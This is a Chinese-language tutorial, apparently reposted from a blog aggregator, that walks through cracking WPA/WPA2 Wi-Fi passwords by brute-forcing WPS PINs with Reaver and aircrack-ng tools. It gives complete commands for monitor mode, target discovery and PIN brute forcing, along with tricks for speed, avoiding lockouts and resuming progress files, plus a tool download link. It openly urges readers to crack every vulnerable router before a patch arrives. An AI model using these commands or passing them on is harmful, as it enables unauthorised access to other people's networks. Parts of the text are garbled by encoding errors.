破解所需資料工具軟件集：http://www.400gb.com/u/156037

Reaver基本命令參數(shù)?

XiaoPanOS下：

???選擇“終端”輸入sudo thunar

???這里是為了取得超級(jí)權(quán)限，選擇系統(tǒng)文件-usr-local-ect-reave

???ifconfig?–a??????????????//確認(rèn)你用哪一個(gè)網(wǎng)卡WLAN0或WLAN1

???airmon-ng start wlan0?????//開啟監(jiān)聽模式

???wash?–i mon0?–C?????????//查看開啟wps的無(wú)線路由器

???airodump-ng mon0??????????//查看周邊AP信息（抓包）

???reaver?–i mon0?–b MAC?–a?–S?–vv?–d 3?–t 3??//開始窮舉PIN碼

???reaver?–i mon0?–b MAC?–a?–S?–vv?–d 0????????//加快速度為1秒

???reaver?–i mon0?–b MAC?–a?–S?–vv?–p xxxx?????//從前4位PIN碼開始

reave的進(jìn)度表文件保存在:

???1.3版：/etc/reaver/MAC地址.wpc

???1.4版：/usr/local/etc/reaver/MAC地址.wpc

CDliunx下：

???選擇“終端”輸入sudo thunar

???這里是為了取得超級(jí)權(quán)限，選擇系統(tǒng)文件-usr-local-ect-reaver-

?

reaver必需的參數(shù):

???-i, --interface=wlan Name of the monitor-mode interface to use??//監(jiān)視模式接口使用的名稱

???-b, --bssid=mac BSSID of the target AP??????????????????//目標(biāo)AP的SSID

?

reaver可選參數(shù):

???-m, --mac=mac MAC of the host system???????//主機(jī)系統(tǒng)的MAC

???-e, --essid=ssid ESSID of the target AP????//目標(biāo)AP的ESSID

???-c, --channel=channel Set the 802.11 channel for the interface (implies -f)????

????????//設(shè)置接口的802.11信道?(意味著?-f)

???-o, --out-file=file Send output to a log file [stdout]?????//輸出發(fā)送到一個(gè)日志文件

???-s, --session=file Restore a previous session file?????//恢復(fù)以前的記錄文件

???-C, --exec=command Execute the supplied command upon successful pin recovery????

????????//所提供的命令執(zhí)行成功后，pin?恢復(fù)

???-D, --daemonize Daemonize reaver?????//守護(hù)進(jìn)程?reaver

???-a, --auto Auto detect the best advanced options for the target AP????

????????//自動(dòng)檢測(cè)目標(biāo)AP的最先進(jìn)的選項(xiàng)

???-f, --fixed Disable channel hopping?????//禁用信道跳頻

???-5, --5ghz Use 5GHz 802.11 channels?????//使用5GHz的802.11信道

???-v, --verbose Display non-critical warnings (-vv for more)?????//顯示非關(guān)鍵的警告（- VV更多）

???-q, --quiet Only display critical messages?????//僅顯示重要消息

???-h, --help Show help?????//顯示幫助

?

reaver高級(jí)選項(xiàng)：

???-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin???????//使用指定的4個(gè)或8個(gè)的?pin WPS

???-d, --delay=seconds Set the delay between pin attempts [1]?????//設(shè)置pin嘗試之間的延遲[1]

???-l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]????

????????//設(shè)置等待的時(shí)間，如果AP鎖定WPS PIN嘗試[60]

???-g, --max-attempts=num Quit after num pin attempts?????//退出后NUM pin嘗試

???-x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]????

????????//設(shè)定時(shí)間后進(jìn)入休眠10[0]意外故障

???-r, --recurring-delay=xy Sleep for y seconds every x pin attempts?????//對(duì)每一個(gè)pin碼嘗試Y秒

???-t, --timeout=seconds Set the receive timeout period [5]?????//設(shè)置接收超時(shí)時(shí)間[5]

???-T, --m57-timeout=seconds Set the M5M7 timeout period [0.20]?????//設(shè)置M5M7超時(shí)期[0.20]

???-A, --no-associate Do not associate with the AP (association must be done by another application)????

????????//不要與AP關(guān)聯(lián)（協(xié)會(huì)必須由另一個(gè)應(yīng)用程序進(jìn)行）

???-N, --no-nacks Do not send NACK messages when out of order packets are received????

????????//不要發(fā)送NACK消息收到時(shí)，為了包出

???-S, --dh-small Use small DH keys to improve crack speed?????//使用小DH密鑰，以提高PJ速度

???-L, --ignore-locks Ignore locked state reported by the target AP?????//忽略鎖定狀態(tài)的目標(biāo)AP

???-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet????

????????//終止每一個(gè)EAP失敗包WPS的記錄

???-n, --nack Target AP always sends a NACK [Auto]?????//目標(biāo)AP發(fā)送一個(gè)NACK[自動(dòng)]

???-w, --win7 Mimic a Windows 7 registrar [False]?????//模仿Windows 7的注冊(cè)處處長(zhǎng)[虛假]

?

reaver?使用方法和技巧:

reaver使用方法:

???reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c?頻道

?????-i?監(jiān)聽后接口名稱

?????-b?目標(biāo)mac地址

?????-a?自動(dòng)檢測(cè)目標(biāo)AP最佳配置

?????-S?使用最小的DH key，可以提高PJ速度

?????-vv?顯示更多的非嚴(yán)重警告

?????-d?即delay每窮舉一次的閑置時(shí)間預(yù)設(shè)為1秒

?????-c?頻道

?????-p PIN碼四位或八位??//可以用8位直接找到密碼。

???當(dāng)出現(xiàn)有百分?jǐn)?shù)時(shí)你就可以用crtl+c來(lái)暫停，它會(huì)將reaver的進(jìn)度表文件保存在

??????1.3版：/etc/reaver/MAC地址.wpc

??????1.4版：/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc)

??????用資源管理器，手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤或硬盤中，

??????下次重啟動(dòng)后，再手工復(fù)制到/etc/reaver/?目錄下即可。

??????注意需要取得ROOT權(quán)限,才可將wpc文件復(fù)制到/etc/reaver/?目錄下:

??????在終端模擬里面輸入:

????????SUDO SU

????????SUDO THUNAR

?

reaver使用技巧:

??1、將mac地址.wpc?備份后，下次可以繼續(xù)使用。

??2、程序默認(rèn)每嘗試后停止一秒，加入-d0參數(shù)使之不停止：

?????reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d0

??3、-p參數(shù)：-p PIN可以讓你在獲取到PIN的情況下直接得到路由WPA密碼！

?????reaver-i mon0 -b MAC -p PIN

??4、wpc結(jié)構(gòu)

?????0??????//這個(gè)地方是說(shuō)它的前4位PIN碼的進(jìn)度位置數(shù)，真實(shí)位置要+4

?????0??????//這個(gè)地方是說(shuō)后3位PIN數(shù)的已經(jīng)運(yùn)行測(cè)試位置數(shù)

?????0??????//0時(shí)沒有找到，當(dāng)為1時(shí)找到前四位，當(dāng)為2時(shí)全部找到。

?????下面是1萬(wàn)個(gè)前四位數(shù)（reaver1.3版4位隨機(jī)數(shù)，1.4版是升序）

?????第4行起

?????0000

?????0001

?????.

?????.

?????9999

?????下面是1千個(gè)三位數(shù)（PIN第八位數(shù)是驗(yàn)證碼）

?????從1004行起

?????000

?????.

?????.

?????999
????????所以前四位很重要，將已經(jīng)知道的前四位放在最前面會(huì)提高你的PIN速度，我們也可以手動(dòng)修改wpc文件第一行，如我們要從3000開始pin你可以將它修改為3004,這樣它就會(huì)從3000開始PIN了。當(dāng)我們?cè)?/span>PIN時(shí)就可以不用保存虛擬機(jī)快照了，只要你記住了前四位，你下載用軟件修改WPC文件就可了。???

?????cdlinux對(duì)wpc文件最方便，

?????beini和xiaopan對(duì)wpc修改要用命令vi來(lái)修改，

?????vi的使用方法很簡(jiǎn)單viXXXX.wpc打開就可以了，

?????輸入i進(jìn)行編輯，輸入escap退回命令模式，輸入:wq退出保存。

?

Pin碼重復(fù)出現(xiàn)死循環(huán)解決之道:

1.xiaopanOS環(huán)境解決之道：

當(dāng)你看到PIN到一定程度，窗口里的PIN碼不變、進(jìn)度百分比也不走，那么，保持原窗口不變，再點(diǎn)擊ROOTSHELL圖標(biāo)，新開一個(gè)PIN窗口，輸入?“reaver -i mon0 -b?（正在PIN的目標(biāo)MAC）?-a -s -vv?”(注意：這里“S”要小寫)?那么，你就會(huì)發(fā)現(xiàn)原來(lái)PIN的窗口，PIN碼開始改變，進(jìn)度開始前進(jìn)了！而且PIN的時(shí)間也大為縮短了！如果是破解到99.99%，執(zhí)行此部操作就馬上彈出正確的pin碼和wifi密碼，以及路由器的SSID。

2.CDlinux環(huán)境解決之道：

當(dāng)你看到PIN到一定程度，窗口里的PIN碼不變、進(jìn)度百分比也不走，那么，請(qǐng)Ctrl+C停止，然后點(diǎn)擊[Reaver]按鈕，在彈出的窗口中輸入“-a -s?–vv“?(注意：這里“S”要小寫)?那么，你就會(huì)發(fā)現(xiàn)原來(lái)PIN的窗口，PIN碼開始改變，進(jìn)度開始前進(jìn)了！而且PIN的時(shí)間也大為縮短了！,如果是破解到99.99%，執(zhí)行此部操作就馬上彈出正確的pin碼和wifi密碼，以及路由器的SSID。

若到90.9%或99.9%還是不出，也可以試試“reaver -i mon0 -b (正在PIN的目標(biāo)MAC) -v -a -n [-c]”

時(shí)間及經(jīng)驗(yàn)總結(jié)，基本90.9%和99.9%的死循環(huán)，已經(jīng)100%成功了，最后祝大家破解愉快！

?

用Reaver pin碼破特點(diǎn)：

1、不需要客戶端，

2、有PIN碼就能獲得無(wú)線密碼，

3、八位數(shù)PIN碼實(shí)際只有一萬(wàn)一千組隨機(jī)密碼，

4、抓包、EWSA跑包，每個(gè)環(huán)節(jié)都有很大的不確定性。而PIN破密，只要開戶WPS，破密只是個(gè)時(shí)間問題。

提醒：大家還是早點(diǎn)都把能pin的路由都破了！可能馬上就有安全補(bǔ)救方案出來(lái)了！到時(shí)候就沒機(jī)會(huì)了，時(shí)不我待、只爭(zhēng)朝夕！

BT5、CDlinux、beini、xiaopan-OS都支持reaver運(yùn)行。

reaver使用方法、步驟：

??? 打開超級(jí)終端?root shell?

??? 如果電腦裝有多個(gè)無(wú)線網(wǎng)卡，請(qǐng)先發(fā)指令ifconfig -a確認(rèn)你用哪一個(gè)網(wǎng)卡WLAN0或WLAN1

下面的指令都是以單一網(wǎng)卡WLAN0為例

一、激活監(jiān)聽模式：????airmon-ng start wlan0

二、查看周邊AP信息（抓包）：airodump-ng??mon0

觀察要破AP的PWR信號(hào)強(qiáng)弱變化，注意同頻干擾，調(diào)整網(wǎng)卡放置位置和角度、方向。

PWR?小于?-75?基本上會(huì)Timeout, PWR-60左右,則非常順暢(2-6秒攻擊一次)

三、按Ctrl+C終止抓包

四、抓PIN碼：?reaver -i mon0 -b MAC -vv

例如：reaver -i mon0 -b C8:3A:35:F6:BB:B8 –vv

1.4版可用：reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v（可用一個(gè)v）

注意，MAC中冒號(hào)不可省略，MAC地址的字母大小寫均可，?-vv是兩個(gè)V不是W！

reaver1.3感覺比1.4更穩(wěn)定些。

特別提示：只有AP開啟了WPS、QSS功能，才可以用PIN法破PSK密碼!

?

如何查看AP是否開了WPS、QSS呢？

一、使用指令: airodump -ng mon0

MB一欄下，出現(xiàn)54e.（看清楚有點(diǎn)“.”）是開WPS的

?

二、WIN7下，用通常的方式連接AP，如果在提示輸入密碼框下面，出現(xiàn)“通過(guò)按路由器按鈕也可以連接”，就確認(rèn)此AP開了WPS、QSS。但是，WIN7下不出現(xiàn)“通過(guò)按路由器按鈕也可以連接”，不等于100%沒開WPS。還是?54e.?準(zhǔn)。

AP關(guān)閉了WPS、或者沒有QSS滴，會(huì)出現(xiàn)“WARNING: Failed to associate with XX:XX:XX:XX:XX:XX??(ESSID: XXXX)”

?

??? PIN破密對(duì)信號(hào)要求極為嚴(yán)格，如果信號(hào)稍差，可能導(dǎo)致破密進(jìn)度變慢或者路由死鎖等（重復(fù)同一個(gè)PIN碼 或?timeout）。
??? 特別是1、6默認(rèn)頻道中，有較多的AP，相互干擾。因此，確定網(wǎng)卡放置的最佳位置、方向、角度十分重要。

????破解過(guò)程中重復(fù)同一個(gè)PIN碼或timeout可隨時(shí)隨地按Ctrl+C終止，reaver會(huì)自動(dòng)保存進(jìn)度。

若繼續(xù)破，則再次在終端中發(fā)送: reaver -i mon0 -b MAC -vv，這個(gè)命令運(yùn)行后，會(huì)讓你選y或n，選y后就繼續(xù)了。

當(dāng)reaver確定前4位PIN密碼后，其工作完成任務(wù)進(jìn)度數(shù)值將直接跳躍至90.9%以上，也就是說(shuō)只剩余一千個(gè)密碼組合了。
總共一萬(wàn)一千個(gè)密碼。

如果，90.9%進(jìn)程后死機(jī)或停機(jī)，請(qǐng)記下PIN前四位數(shù)，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位數(shù))

????會(huì)從指定PIN段起破密。

?

如何保存破密進(jìn)程呢：

reave的進(jìn)度表文件保存在

1.3版：/etc/reaver/MAC地址.wpc

1.4版：/usr/local/etc/reaver/MAC地址.wpc

用資源管理器，手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤或硬盤中，下次重啟動(dòng)后，再手工復(fù)制到/etc/reaver/?目錄下即可。CDLINUX下可以粘貼在CDLINUX的桌面上但就是不能粘貼在?usr/local/etc/reaver里面，
解決方法：

新開個(gè)窗口輸入?sudo thunar，這樣打開的文件管理器，具有root權(quán)限，可以拷貝文件到任何目錄了！

timeout時(shí)，可適當(dāng)調(diào)整網(wǎng)卡方位，在同一PIN數(shù)值反復(fù)測(cè)試。也可Ctrl+C終止破密，讓路由器休息幾十秒，也是不錯(cuò)的選擇，否則個(gè)別型號(hào)AP會(huì)自鎖PIN連接功能。

另外，也可以給命令增加2個(gè)參數(shù)，延長(zhǎng)PIN窮舉和反饋的響應(yīng)時(shí)間避免路由當(dāng)機(jī)。

reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3

????-d?即delay每窮舉一次的閑置時(shí)間預(yù)設(shè)為1秒

????-t?即timeout每次窮舉等待反饋的最長(zhǎng)時(shí)間

總結(jié)

以上是生活随笔為你收集整理的wpa/wpa2无线网pin码破解的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。